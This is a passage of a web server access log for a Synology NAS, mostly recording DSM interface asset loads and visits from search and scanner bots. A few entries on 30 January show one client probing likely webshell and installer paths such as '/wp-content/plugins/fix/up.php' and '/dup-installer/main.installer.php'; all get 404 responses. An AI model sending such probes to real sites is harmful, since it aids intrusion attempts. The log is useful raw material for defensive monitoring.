(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 91.98.176.86] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 91.98.176.86] [Length 13476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 91.98.176.86] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 91.98.176.86] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 91.98.176.86] [Length 2046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:03 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 91.98.176.86] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:05 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 91.98.176.86] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:05 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 91.98.176.86] [Length 5551] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:07 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 91.98.176.86] [Length 75280] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:07 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 91.98.176.86] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 91.98.176.86] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 91.98.176.86] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 91.98.176.86] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 91.98.176.86] [Length 102697] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 91.98.176.86] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 91.98.176.86] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 91.98.176.86] [Length 4648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 91.98.176.86] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/3rdparty/VideoStation/style.css?v=1711016943" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 91.98.176.86] [Length 196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ext-all.js?v=1650348555" [Client 91.98.176.86] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 91.98.176.86] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 91.98.176.86] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 91.98.176.86] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.js?v=1650348555" [Client 91.98.176.86] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/constants.js?v=1650348555" [Client 91.98.176.86] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/index.js?v=1650348555" [Client 91.98.176.86] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 91.98.176.86] [Length 585920] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/sodium.js?v=1650348555" [Client 91.98.176.86] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vuex/vuex.min.js?v=1585722123" [Client 91.98.176.86] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 91.98.176.86] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue/vue.min.js?v=1633587521" [Client 91.98.176.86] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/vendor.js?v=1654081517" [Client 91.98.176.86] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 91.98.176.86] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:08 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.js?v=1678269761" [Client 91.98.176.86] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 91.98.176.86] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.wasm" [Client 91.98.176.86] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 91.98.176.86] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/2.style.css" [Client 91.98.176.86] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 91.98.176.86] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 91.98.176.86] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 91.98.176.86] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 91.98.176.86] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 91.98.176.86] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/login/dist/style.css?v=1661421011" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 91.98.176.86] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/login_background.jpg?id=1" [Client 91.98.176.86] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 91.98.176.86] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 91.98.176.86] [Length 11903] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 91.98.176.86] [Length 11226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 91.98.176.86] [Length 100237] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:09:12:36 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 74.7.244.19] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:18:41:40 +0000] - - 301 - GET http profibot.synology.me "/" [Client 167.94.138.179] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:32 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 199.45.154.125] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:39 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 199.45.154.125] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:44 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 199.45.154.125] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:46 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_64.png?v=40438" [Client 199.45.154.125] [Length 1312] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:53 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 199.45.154.125] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:18:46:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 199.45.154.125] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:13:30:21 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 162.142.125.44] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:13:30:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 162.142.125.44] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:13:31:04 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 162.142.125.44] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:13:42:28 +0000] - - 301 - GET http profibot.synology.me "/" [Client 199.45.155.91] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[30/Jan/2026:02:43:19 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 198.12.106.59] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "-" +[30/Jan/2026:05:04:26 +0000] - - 301 - GET http profibot.synology.me "/wp-content/plugins/fix/up.php" [Client 217.194.215.46] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[30/Jan/2026:05:04:26 +0000] - 404 404 - GET https profibot.synology.me "/wp-content/plugins/fix/up.php" [Client 217.194.215.46] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "http://profibot.synology.me/wp-content/plugins/fix/up.php" +[30/Jan/2026:05:10:45 +0000] - 404 404 - GET https profibot.synology.me "/dup-installer/main.installer.php" [Client 217.194.215.46] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[30/Jan/2026:05:11:49 +0000] - 404 404 - GET https profibot.synology.me "/wp-content/themes/seotheme/db.php?u" [Client 217.194.215.46] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[30/Jan/2026:07:18:42 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 74.7.244.19] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:14:02:07 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 116.202.146.229] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:02:07 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 116.202.146.229] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/style.css?v=1661421011" [Client 116.202.146.229] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/style.css?v=1661421011" [Client 116.202.146.229] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 116.202.146.229] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 116.202.146.229] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 116.202.146.229] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.css?v=1654081517" [Client 116.202.146.229] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 